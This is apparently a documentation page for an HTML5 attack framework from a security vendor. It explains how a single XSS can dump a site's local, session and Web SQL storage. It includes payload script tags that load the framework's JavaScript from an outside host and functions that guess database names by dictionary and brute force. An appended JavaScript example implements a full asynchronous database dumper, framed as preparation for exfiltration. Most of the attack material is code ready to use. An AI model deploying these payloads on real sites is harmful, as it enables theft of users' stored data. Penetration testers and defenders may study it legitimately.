Local/Session storage
Some websites store information in the browser's session, local or global storage. Anything kept there is readable by any script running in the page's origin, so a single XSS is enough to read all of it and send it to an attacker-controlled server. The function html5storage_dump_storages() demonstrates this: it collects the contents of every existing storage area (session storage, local storage, global storage).
An example proof of concept:
<script src='https://appsec-labs.com/html5/html5_attack_framerwork.js'></script>
<script>alert(html5storage_dump_storages());</script>
This is a part of the HTML5_attack_framework.
SQLite storage
To collect the data you have to run SQL queries, and the problem is that the Web SQL API is asynchronous: executeSql() returns nothing, and the results are delivered later to a callback. Therefore the exploitation is a bit more complex: the functions write their results into a global variable named 'dump', and you collect the information from it once the queries have completed (the framework sets is_dump_finish when they have). An additional problem is that you need to know the database name; the HTML5 exploitation framework uses a number of methods to find it. Note that Web SQL was only ever implemented in WebKit/Blink-based browsers (Firefox never shipped it) and has since been removed from current Chromium-based browsers, so this part of the framework applies to older browsers.
The basic exploitation that collects the local/session storages and the SQLite storage is:
<script src='https://appsec-labs.com/html5/html5_attack_framerwork.js'></script>
<script>
html5storage_dump_all();
// poll until the asynchronous SQL callbacks have all reported back, then render the dump
var IntervalId = setInterval(function () {
  if (is_dump_finish) {
    document.write('<pre>' + HTMLEncode(dump) + '</pre>');
    clearInterval(IntervalId);
  }
}, 5000);
</script>
This is a part of the HTML5_attack_framework.
This basic exploitation tries the following:
- sqlite_dump_database_by_obj – every object found on the page.
- sqlite_dump_database_by_dict – the following database names: 'sql', 'SQL', 'DB', 'db', 'SQLITE', 'SQLite', 'sqlite', 'DB1', 'db1', 'DataBase', 'DATEBASE', 'sqli'.
- sqlite_dump_database_by_bruteforce – every name of two lowercase letters, with no prefix or suffix.
To dump a specific, known database, use something like:
sqlite_dump_database_if_exist('my_data_base');
// the query results arrive asynchronously, so read dump after a short delay
setTimeout("alert(dump)", 500);
You can also use specific functions for specific exploits:
Function sqlite_dump_database_if_exist(name) – receives the name of a database and dumps it (into the dump variable) if it exists.
Function sqlite_dump_database_by_dict(dict) – receives a list of candidate names (for example ['dbname', 'database1']) and fetches the data of each one that exists.
Function sqlite_dump_database_by_obj() – checks all the variables of the page and, if one of them is an object connected to a database, fetches the data through it, without needing to know the database name.
Function sqlite_dump_database(DBname, DBobj) – if you know the database, use this function. The optional DBobj parameter lets you pass an object that is already connected to the database.
Function sqlite_dump_table(DBname, table, DBobj) – dumps a specific table. DBobj is optional here too.
Function sqlite_dump_database_by_bruteforce(chars, str, prefix, endfix, cur_char, cur_change) – searches for databases by brute force (endfix is the suffix appended to each guess). Be aware that it takes a few seconds.
An example run:
// candidate character sets; only alphabeta is used in the call below
var alphabeta = "abcdefghijklmnopqrstuvwxyz";
var alphanumeric = "abcdefghijklmnopqrstuvwxyz0123456789";
var capandlittle = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
var maxlen = 2;      // length of the names to try
var prefix = "";     // fixed text in front of every guess
var endfix = "";     // fixed text after every guess
// str is a placeholder of maxlen characters that the brute force fills in position by position
sqlite_dump_database_by_bruteforce(alphabeta, " ".repeat(maxlen), prefix, endfix, 0, 0);
All of the above functions dump the data into the global variable 'dump'.
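The whole SQLite procedure above, as an added example that is not the framework's own code: it shows the callback-driven dump the page describes (enumerate the tables through SQLite's sqlite_master catalog, select each one, and count outstanding queries to know when the dump is finished, which is what is_dump_finish stands for) together with the name guessing of sqlite_dump_database_by_dict. openDatabase() is a browser API, so a constructed in-memory stand-in with the same callback shape (db.transaction(cb), tx.executeSql(sql, args, onSuccess, onError)) is used as input; the function names, the stand-in and the sample data are assumptions, not the framework's.

```javascript
// Added example, not code from the HTML5 attack framework. Constructed stand-in
// for a Web SQL database: same callback shape as openDatabase()'s result.
function fakeDatabase(tables) {
  // tables: { tableName: [ {col: value, ...}, ... ] }; sqlite_master is derived from it.
  const resultSet = (rows) => ({ rows: { length: rows.length, item: (i) => rows[i] } });
  function executeSql(sql, args, onOk, onErr) {
    let m;
    if (/FROM\s+sqlite_master/i.test(sql)) {
      onOk(tx, resultSet(Object.keys(tables).map((name) => ({ name }))));
    } else if ((m = /^SELECT \* FROM "?(\w+)"?$/i.exec(sql)) && tables[m[1]]) {
      onOk(tx, resultSet(tables[m[1]]));
    } else if (onErr) {
      onErr(tx, { message: "no such table" });
    }
  }
  const tx = { executeSql };
  // Real Web SQL defers every callback; the stand-in fires them at once.
  // The dumper below works either way because it never assumes an ordering.
  return { transaction: (cb) => cb(tx) };
}

// Dumps every table of `db` into dump[dbName] and calls done(dump) after the last
// query has reported back. Completion is tracked by counting outstanding queries;
// a global flag like is_dump_finish would be set from inside done().
function dumpDatabase(dbName, db, dump, done) {
  dump[dbName] = {};
  db.transaction(function (tx) {
    // sqlite_master is SQLite's own catalog, so no table names need to be known.
    tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [], function (tx, rs) {
      let pending = rs.rows.length;
      if (pending === 0) { done(dump); return; }
      for (let i = 0; i < rs.rows.length; i++) {
        const table = rs.rows.item(i).name;
        // table names come from the database itself, so quote them as identifiers
        tx.executeSql('SELECT * FROM "' + table.replace(/"/g, '""') + '"', [], function (tx, trs) {
          const rows = [];
          for (let j = 0; j < trs.rows.length; j++) rows.push(trs.rows.item(j));
          dump[dbName][table] = rows;
          if (--pending === 0) done(dump);
        }, function (tx, err) {
          dump[dbName][table] = { error: err.message };
          if (--pending === 0) done(dump);
        });
      }
    });
  });
}

// Tries each candidate name. openDatabase() creates a database that does not exist
// yet, so the only usable sign of existence is "has at least one table"; names that
// come back empty are dropped, which is the check the *_if_exist / *_by_dict style
// helpers have to make. `open(name)` wraps openDatabase(name, "", name, 1024 * 1024)
// in a browser.
function dumpByDict(names, open, done) {
  const dump = {};
  let pending = names.length;
  names.forEach(function (name) {
    dumpDatabase(name, open(name), dump, function () {
      if (Object.keys(dump[name]).length === 0) delete dump[name];
      if (--pending === 0) done(dump);
    });
  });
  return dump;
}

// Constructed sample: one real database named "db"; every other name opens empty.
const SAMPLE_DBS = {
  db: fakeDatabase({
    users: [{ id: 1, email: "alice@example.test", pw_hash: "ab12" }],
    notes: [],
  }),
};
function openSample(name) {
  return SAMPLE_DBS[name] || fakeDatabase({});
}

function demo() {
  let result = null;
  dumpByDict(["sql", "DB", "db"], openSample, function (d) { result = d; });
  // Non-null here only because the stand-in is synchronous; against real Web SQL
  // the caller must wait for done() (or poll a flag) exactly as the page's
  // setInterval loop does.
  return result;
}
```

The two things worth taking from this are the catalog query, which removes the need to know any table name once the database name is right, and the pending counter, which is the only reliable way to know that an asynchronous dump is complete before exfiltrating it.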